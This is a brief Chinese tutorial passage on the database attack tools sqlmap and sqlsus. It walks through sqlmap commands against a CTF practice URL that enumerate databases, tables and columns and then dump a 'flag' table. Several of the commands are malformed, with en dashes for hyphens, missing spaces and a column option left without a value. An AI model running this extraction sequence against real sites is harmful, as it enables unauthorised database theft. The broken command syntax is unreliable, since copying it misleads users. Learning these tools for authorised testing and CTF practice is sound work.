前言

服务提供的所有信息保存在数据库中。因此，数据库总会成为攻击者的攻击对象。本节将介绍以数据库为对象，通过网络服务和近场通信网络获取信息的工具。

SQLmap：获取数据库信息

sqlmap是一款开源的渗透测试工具，它可以自动搜索SQL注入漏洞，并自动化攻击数据库服务器。这款功能超强的搜索检测引擎可以从数据库的Fingerprinting（获取信息）向数据库输出数据、访问文件系统、访问频段外区域以执行OS上的命令等。为实施最理想的渗透测试提供了多种便利功能和诸多选项开关。

在上面的截图中给出了sqlmap的使用参考说明，自己也可以在Kali linux的终端输入sqlmap -h 命令进行查看具体信息。

SQLmap实例：

（1）在终端输入命令：“Sqlmap.py –u 目标URL”  ，-u扫描注入点扫描目标主机，检测出的信息准确。

（2）爆出数据库：

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–-dbs

（3）爆表：

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –-tables

(4)爆字段：

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –T flag –-columns 

(5)显示字段值：

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1 –D web1 –T flag –C--dump

sqlsus:把握数据库结构

Sqlsus是基于Perl编写的开源MySQL注入接管（takeover）工具。Sqlsus可通过命令行界面进行数据库结构搜素、数据库复制、sql查询插入、从网络服务器下载文件、网站抓取等等操作。另外sqlsus还提供了MySQL控制台功能，而且能够优质高效、最大限度地发挥MySQL功能。

注意：这个主要是针对数据库的配置文件进行分析来获取相应的信息的！